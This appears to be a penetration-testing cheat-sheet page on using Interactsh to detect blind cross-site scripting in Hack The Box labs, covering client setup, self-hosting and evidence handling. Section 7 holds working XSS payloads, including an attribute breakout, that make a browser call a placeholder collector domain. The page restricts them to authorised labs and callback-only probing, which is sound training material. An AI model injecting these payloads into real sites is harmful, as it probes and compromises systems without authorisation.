daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

blind-xss-tool-interactsh.md (17926B)


      1 ---
      2 title: "Blind XSS Tool - Interactsh"
      3 description: "Interactsh generates unique out-of-band interaction domains and reports DNS, HTTP, SMTP, LDAP, and other callbacks. For blind XSS, it is a fast way to…"
      4 category: web
      5 tags: ["web", "xss"]
      6 tools: []
      7 difficulty: intermediate
      8 updated: "2026-08-10"
      9 source: "vault:Web/Blind XSS Tool - Interactsh.md"
     10 ---
     11 # Blind XSS Tool — Interactsh `fas:ClipboardList`
     12 
     13 ## Summary
     14 
     15 [Interactsh](https://github.com/projectdiscovery/interactsh) generates unique out-of-band interaction domains and reports DNS, HTTP, SMTP, LDAP, and other callbacks. For blind XSS, it is a fast way to determine whether an unseen browser resolved or requested a unique address. It is lighter than XSS Hunter or ezXSS, but it does not automatically provide the same screenshots, DOM captures, or browser-specific evidence.
     16 
     17 > [!danger]+ HTB-Only Boundary
     18 > `fas:TriangleExclamation`
     19 > 1. Use Interactsh only in Hack The Box, deliberately vulnerable applications, or systems you own and are explicitly authorised to test.
     20 > 2. Start with callback-only probes that collect no cookies, DOM, or browser storage.
     21 > 3. Public Interactsh services are third-party infrastructure; do not send sensitive lab data in callback paths.
     22 > 4. See Cross-Site Scripting (XSS) - HTB Cheat Sheet for context-specific payloads and impact validation.
     23 
     24 ---
     25 
     26 ## Conceptual Information
     27 
     28 ### What Interactsh Proves
     29 
     30 | Observation | Strongest safe conclusion | What it does not prove |
     31 |---|---|---|
     32 | DNS callback only | A system resolved the unique hostname | Browser JavaScript execution |
     33 | HTTP request for an injected image URL | A renderer parsed the resource reference and requested it | JavaScript execution |
     34 | HTTP request created inside an event handler | Browser-side JavaScript executed and egress was available | Cookie access or privileged actions |
     35 | Repeated callbacks | The stored value was rendered more than once | Number of distinct users without correlation evidence |
     36 | No callback | Nothing reached this collector during the observation window | Absence of XSS; CSP, routing, rendering, or timing may block it |
     37 
     38 ### Choose the Right Collector
     39 
     40 | Need | Recommended tool |
     41 |---|---|
     42 | Fast unique DNS/HTTP confirmation | **Interactsh** |
     43 | Screenshots, DOM, and rich browser reports | Blind XSS Tool - XSS Hunter |
     44 | Flexible self-hosted payload and notification controls | Blind XSS Tool - ezXSS |
     45 | Raw callback visible over the HTB VPN | Python HTTP server or Netcat from the main XSS note |
     46 
     47 > [!info]+ Correlation Model
     48 > 1. The client generates a unique domain containing a correlation identifier and nonce.
     49 > 2. The server records interactions for that identifier.
     50 > 3. The client polls and decrypts or displays matching events.
     51 > 4. Add your own field label as a subdomain or path only when it remains within the generated unique domain structure.
     52 
     53 ---
     54 
     55 ## Tools Overview `fas:Screwdriver`
     56 
     57 > [!info]+ [Interactsh Web Client](https://app.interactsh.com) Overview
     58 > 1. Browser-based dashboard with no local installation.
     59 > 2. Stores session state in browser storage.
     60 > 3. Best for a quick, non-sensitive HTB callback test.
     61 
     62 > [!info]+ Interactsh CLI Client Overview
     63 > `fas:Terminal`
     64 > 1. Generates payloads and polls for interactions in a terminal.
     65 > 2. Supports session files, JSON output, custom servers, and protected-server tokens.
     66 > 3. Best for reproducible lab notes and long-running polling.
     67 
     68 > [!info]+ Interactsh Server Overview
     69 > 1. Self-hosted DNS and application-protocol interaction collector.
     70 > 2. Requires a dedicated domain, nameserver delegation, a public server, and careful exposure controls.
     71 > 3. Best when public shared infrastructure is unsuitable or unreliable.
     72 
     73 ---
     74 
     75 ## Commands and Implementation
     76 
     77 ### 1. Hosted Web Client — Fastest Start
     78 
     79 1. Open [https://app.interactsh.com](https://app.interactsh.com).
     80 2. Copy the unique generated domain.
     81 3. Open `https://UNIQUE_DOMAIN/self-test` in a separate lab browser tab.
     82 4. Confirm that DNS and HTTP events appear.
     83 5. Keep the tab open while testing the HTB field.
     84 6. Export or record the minimal callback evidence, then clear the browser session when finished.
     85 
     86 > [!warning]+ Hosted Service Boundary
     87 > `fas:TriangleExclamation`
     88 > 1. Treat the generated domain as temporary.
     89 > 2. Do not place cookies, tokens, DOM content, usernames, or flags in the callback URL.
     90 > 3. Public server availability and default domains may change; use the CLI or self-hosting when reliability matters.
     91 
     92 ### 2. Install the CLI with Go
     93 
     94 The project README currently requires Go `1.20` or newer for source installation.
     95 
     96 ```bash
     97 go version
     98 go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
     99 interactsh-client -version
    100 ```
    101 
    102 > [!info]+ Command Breakdown
    103 > `fas:Terminal`
    104 > 1. **`go version`**: Confirm the local Go toolchain meets the project requirement.
    105 > 2. **`@latest`**: Installs the current published client from the official module path.
    106 > 3. Ensure the Go binary directory is in `PATH` if the final command is not found.
    107 
    108 ### 3. Start a Persistent Client Session
    109 
    110 ```bash
    111 interactsh-client -sf interactsh-htb.session
    112 [INF] Listing 1 payload for OOB Testing
    113 UNIQUE_CORRELATION_ID.oast.example
    114 ```
    115 
    116 > [!info]+ Session Breakdown
    117 > 1. **`-sf interactsh-htb.session`**: Saves the client session so polling can resume after interruption.
    118 > 2. The displayed hostname is unique to this session; copy it exactly.
    119 > 3. Keep the session file private because it associates the client with its interactions.
    120 > 4. The default public domains may rotate, so use the value printed by the client rather than a hard-coded suffix.
    121 
    122 If the current public service requires ProjectDiscovery authentication:
    123 
    124 ```bash
    125 interactsh-client -auth
    126 ```
    127 
    128 > [!info]+ Authentication Note
    129 > 1. Follow the interactive prompt and use your own ProjectDiscovery Cloud Platform API key.
    130 > 2. Do not paste API keys into command history or the Obsidian vault.
    131 > 3. Public-server authentication is separate from a token used by a protected self-hosted server.
    132 
    133 ### 4. Run the CLI Client with Docker
    134 
    135 ```bash
    136 docker run --rm -it projectdiscovery/interactsh-client:latest
    137 [INF] Listing 1 payload for OOB Testing
    138 UNIQUE_CORRELATION_ID.oast.example
    139 ```
    140 
    141 > [!info]+ Docker Breakdown
    142 > `fas:Terminal`
    143 > 1. **`--rm`**: Removes the temporary container after exit.
    144 > 2. **`-it`**: Keeps the polling client interactive.
    145 > 3. Mount a dedicated directory only when you need persistent session or output files.
    146 
    147 Persist a session file in the current directory:
    148 
    149 ```bash
    150 mkdir -p interactsh-state
    151 docker run --rm -it \
    152   -v "$PWD/interactsh-state:/state" \
    153   projectdiscovery/interactsh-client:latest \
    154   -sf /state/htb.session
    155 ```
    156 
    157 > [!warning]+ Session Storage
    158 > `fas:TriangleExclamation`
    159 > 1. Restrict the `interactsh-state` directory to your user.
    160 > 2. Do not commit session or JSON output files.
    161 > 3. Remove them after recording the required HTB evidence.
    162 
    163 ### 5. Verify the Collector Before Injection
    164 
    165 ```bash
    166 curl -i "https://UNIQUE_DOMAIN/self-test"
    167 HTTP/2 200
    168 content-type: text/html; charset=utf-8
    169 ```
    170 
    171 > [!success]+ Expected Result
    172 > 1. The client reports a DNS lookup and an HTTP request for `/self-test`.
    173 > 2. The event time, protocol, source address, and request metadata appear.
    174 > 3. If only DNS appears, inspect TLS, routing, and HTTP service availability before planting the HTB payload.
    175 
    176 ### 6. Create Unique HTB Correlation Labels
    177 
    178 | Field under test | Example label |
    179 |---|---|
    180 | Support message | `support-message-20260808-1530` |
    181 | Display name | `profile-name-20260808-1535` |
    182 | `User-Agent` header | `user-agent-20260808-1540` |
    183 | `Referer` header | `referer-20260808-1545` |
    184 | Filename | `filename-20260808-1550` |
    185 
    186 Use the label in the path when the generated domain format must remain unchanged:
    187 
    188 ```text
    189 https://UNIQUE_DOMAIN/support-message-20260808-1530
    190 ```
    191 
    192 > [!tip]+ Attribution Rule
    193 > `fas:Lightbulb`
    194 > 1. Submit one labelled field at a time.
    195 > 2. Keep a small table mapping label → request → account → time.
    196 > 3. Do not include flags, usernames, or secrets in labels.
    197 
    198 ### 7. Blind-XSS Callback Payloads
    199 
    200 Replace `UNIQUE_DOMAIN` and the label with values from the active session.
    201 
    202 ```html
    203 <!-- Resource callback: proves HTML parsing and outbound resource loading -->
    204 <img src="https://UNIQUE_DOMAIN/support-message-20260808-1530">
    205 
    206 <!-- Event-handler callback: proves JavaScript execution -->
    207 <img src=x onerror="new Image().src='https://UNIQUE_DOMAIN/js-support-message-20260808-1530'">
    208 
    209 <!-- Confirmed double-quoted attribute breakout -->
    210 "><img src=x onerror="new Image().src='https://UNIQUE_DOMAIN/attr-profile-name-20260808-1535'">
    211 ```
    212 
    213 > [!warning]+ Payload Interpretation
    214 > `fas:TriangleExclamation`
    215 > 1. The first payload can fire without JavaScript; report it as resource loading, not script execution.
    216 > 2. The second and third callbacks originate inside an event handler and therefore support a JavaScript-execution finding.
    217 > 3. CSP, sanitisation, mixed-content policy, or outbound filtering may prevent a callback even when injection exists.
    218 > 4. Keep callback URLs free of cookies and other sensitive values on public infrastructure.
    219 
    220 ### 8. Read and Record an Interaction
    221 
    222 | Field | Interpretation |
    223 |---|---|
    224 | Protocol | DNS, HTTP, SMTP, LDAP, or another supported interaction |
    225 | Unique ID | Connects the event to the generated payload |
    226 | Remote address | Network source seen by the collector; may be a proxy or resolver |
    227 | Timestamp | Helps correlate asynchronous rendering |
    228 | HTTP path | Identifies the tested field label |
    229 | Headers | May reveal browser, proxy, or automation context |
    230 | Raw request | Evidence of the exact callback; may contain sensitive values if the payload included them |
    231 
    232 > [!success]+ Minimum HTB Evidence
    233 > 1. Screenshot or export the interaction with its unique label and timestamp.
    234 > 2. Save the request that planted the payload.
    235 > 3. State whether evidence was DNS-only, resource loading, or JavaScript-created HTTP.
    236 > 4. Remove the stored payload and delete local session/output data after the write-up is complete.
    237 
    238 ---
    239 
    240 ## Optional Self-Hosting
    241 
    242 > [!important]+ Self-Hosting Requirements
    243 > `fas:TriangleExclamation`
    244 > 1. A dedicated domain used only for OAST.
    245 > 2. Glue or host records such as `ns1` and `ns2` pointing to the server public IP.
    246 > 3. Nameserver delegation of the OAST domain to those hosts.
    247 > 4. A public VPS able to bind DNS and HTTP/TLS ports.
    248 > 5. A protected client token, restricted administration, monitoring, and a retention decision.
    249 
    250 ### 9. Configure DNS Delegation
    251 
    252 At the registrar or authoritative DNS provider:
    253 
    254 1. Create host/glue record `ns1.oast.YOUR_DOMAIN` → `SERVER_IP`.
    255 2. Create host/glue record `ns2.oast.YOUR_DOMAIN` → `SERVER_IP`.
    256 3. Delegate `oast.YOUR_DOMAIN` to `ns1.oast.YOUR_DOMAIN` and `ns2.oast.YOUR_DOMAIN`.
    257 4. Wait for delegation to propagate.
    258 5. Verify from an independent resolver.
    259 
    260 ```bash
    261 dig NS oast.YOUR_DOMAIN +short
    262 dig A ns1.oast.YOUR_DOMAIN +short
    263 dig A ns2.oast.YOUR_DOMAIN +short
    264 ```
    265 
    266 > [!success]+ Expected DNS Result
    267 > 1. The delegated nameservers are returned for the OAST domain.
    268 > 2. Both nameserver hosts resolve to the intended server address.
    269 > 3. Do not start payload testing until delegation is consistent externally.
    270 
    271 ### 10. Install and Start the Server
    272 
    273 ```bash
    274 go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest
    275 interactsh-server -version
    276 sudo interactsh-server -domain oast.YOUR_DOMAIN
    277 ```
    278 
    279 > [!info]+ Server Breakdown
    280 > `fas:Terminal`
    281 > 1. **`-domain`**: Sets the dedicated delegated OAST domain.
    282 > 2. The server attempts to discover public addresses and configure supported listeners.
    283 > 3. Privileged ports require appropriate OS capabilities or a carefully managed service account; avoid running a long-lived service interactively as root.
    284 > 4. Inspect `interactsh-server -h` on the installed version before production use because supported services and flags evolve.
    285 
    286 Common service ports include:
    287 
    288 | Protocol | Port | Required for browser-focused XSS? |
    289 |---|---:|---|
    290 | DNS | UDP/TCP `53` | Yes |
    291 | HTTP | TCP `80` | Useful for redirects and plaintext labs |
    292 | HTTPS | TCP `443` | Yes for secure callback reliability |
    293 | SMTP/SMTPS | TCP `25`/`587` | No, unless testing mail interactions |
    294 | LDAP | TCP `389` | No, unless testing LDAP interactions |
    295 
    296 > [!warning]+ Least Exposure
    297 > `fas:TriangleExclamation`
    298 > 1. Expose only the protocols required for the authorised test.
    299 > 2. Use the installed version's help output to disable unused listeners where supported.
    300 > 3. Apply cloud and host firewall rules together.
    301 > 4. Run the service under a dedicated account with only the required bind capabilities.
    302 
    303 ### 11. Connect a Client to the Self-Hosted Server
    304 
    305 ```bash
    306 interactsh-client -server oast.YOUR_DOMAIN
    307 ```
    308 
    309 For a protected server:
    310 
    311 ```bash
    312 interactsh-client -server oast.YOUR_DOMAIN -token SELF_HOSTED_CLIENT_TOKEN
    313 ```
    314 
    315 > [!info]+ Client Connection
    316 > 1. **`-server`**: Overrides the rotating public server list.
    317 > 2. **`-token`**: Authenticates to a protected self-hosted server.
    318 > 3. Store the token in a protected configuration file or secret manager rather than shell history.
    319 
    320 ### 12. Optional Static Payload Hosting
    321 
    322 The self-hosted server can expose files under its `/s/` path when started with an HTTP directory:
    323 
    324 ```bash
    325 interactsh-server \
    326   -domain oast.YOUR_DOMAIN \
    327   -http-directory ./lab-payloads
    328 ```
    329 
    330 > [!warning]+ Static Hosting Boundary
    331 > `fas:TriangleExclamation`
    332 > 1. Host only minimal, reviewed HTB lab files.
    333 > 2. Do not enable dynamic responses or arbitrary public script hosting on a domain shared with other services.
    334 > 3. Keep the directory read-only to the service and review its contents before every run.
    335 
    336 ---
    337 
    338 ## Operations and Lifecycle
    339 
    340 ### Logs and Session Output
    341 
    342 ```bash
    343 interactsh-client -sf interactsh-htb.session -json -o interactions.jsonl
    344 ```
    345 
    346 > [!info]+ Output Breakdown
    347 > 1. **`-json`**: Produces structured interaction records.
    348 > 2. **`-o`**: Writes events to the named file.
    349 > 3. Protect the session and JSONL files because request headers and callback paths may be sensitive.
    350 
    351 ### Update
    352 
    353 ```bash
    354 go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
    355 interactsh-client -version
    356 ```
    357 
    358 For Docker, pull the current client image before the next lab:
    359 
    360 ```bash
    361 docker pull projectdiscovery/interactsh-client:latest
    362 ```
    363 
    364 > [!tip]+ Update Check
    365 > `fas:Lightbulb`
    366 > 1. Review the official release notes before updating a self-hosted server.
    367 > 2. Verify client/server compatibility and complete a DNS-plus-HTTP self-test.
    368 > 3. Keep the previous binary or VPS snapshot until the new version is verified.
    369 
    370 ### Retention and Cleanup
    371 
    372 1. Stop polling after the HTB observation window.
    373 2. Export only the interaction records needed for the write-up.
    374 3. Clear the hosted web client's browser storage when the session is no longer required.
    375 4. Remove local session and JSONL files after evidence verification.
    376 5. For self-hosting, stop the service, revoke client tokens, remove DNS delegation, and close exposed ports.
    377 6. Keep no callback data beyond the lab/reporting requirement.
    378 
    379 > [!danger]+ Self-Hosted Retirement
    380 > `fas:TriangleExclamation`
    381 > 1. Removing only the web service leaves delegated DNS and other listeners exposed.
    382 > 2. Verify both cloud and host firewalls after shutdown.
    383 > 3. Remove or repurpose the dedicated domain only after DNS caches have expired and no test payloads remain stored.
    384 
    385 ---
    386 
    387 ## Troubleshooting
    388 
    389 > [!failure]+ No Interaction Appears
    390 > `fas:CircleXmark`
    391 > 1. Open the generated URL yourself and confirm DNS plus HTTP events.
    392 > 2. Verify that the client is still polling the correct session.
    393 > 3. Inspect the HTB browser Console and Network for CSP, TLS, mixed-content, or sanitisation failures.
    394 > 4. Confirm the stored field is rendered by the expected user or background workflow.
    395 > 5. Test a simple `<img src>` before an event-handler callback.
    396 
    397 > [!failure]+ DNS Appears but HTTP Does Not
    398 > `fas:CircleXmark`
    399 > 1. Confirm the exact scheme and hostname requested by the payload.
    400 > 2. Test HTTPS directly with `curl`.
    401 > 3. Check server port exposure and certificate validity.
    402 > 4. Remember that DNS-only evidence does not prove JavaScript execution.
    403 
    404 > [!failure]+ Self-Hosted Domain Does Not Register
    405 > `fas:CircleXmark`
    406 > 1. Verify glue records and nameserver delegation from an external resolver.
    407 > 2. Confirm UDP and TCP `53` reach the server.
    408 > 3. Confirm no existing DNS daemon occupies port `53`.
    409 > 4. Review server logs and the current version's help output.
    410 
    411 > [!failure]+ Public Server or Authentication Error
    412 > `fas:CircleXmark`
    413 > 1. Run `interactsh-client -auth` if the selected public service requires a ProjectDiscovery API key.
    414 > 2. Generate a fresh session rather than reusing an expired domain.
    415 > 3. Try another official default server through the client's supported configuration.
    416 > 4. Move to a protected self-hosted server when public availability is unsuitable.
    417 
    418 ---
    419 
    420 ## Lessons Learned `fas:Lightbulb`
    421 
    422 1. DNS, resource loading, and JavaScript execution are three different evidence levels and must be reported separately.
    423 2. Unique labels turn asynchronous blind callbacks into attributable findings.
    424 3. Public OAST infrastructure is ideal for harmless reachability tests, not sensitive data collection.
    425 4. Self-hosting improves control but adds DNS, TLS, firewall, token, logging, and retention responsibilities.
    426 
    427 ---
    428 
    429 ## References `fas:BookOpen`
    430 
    431 1. [ProjectDiscovery Interactsh Repository](https://github.com/projectdiscovery/interactsh)
    432 2. [Interactsh Web Client](https://app.interactsh.com)
    433 3. [ProjectDiscovery Interactsh Release Article](https://projectdiscovery.io/blog/interactsh-release)
    434 4. [Docker Client Image](https://hub.docker.com/r/projectdiscovery/interactsh-client)
    435 5. Cross-Site Scripting (XSS) - HTB Cheat Sheet
    436 6. Blind XSS Tool - XSS Hunter
    437 7. Blind XSS Tool - ezXSS
    438 
    439 #HTB #WebSecurity #XSS #BlindXSS #Interactsh #OAST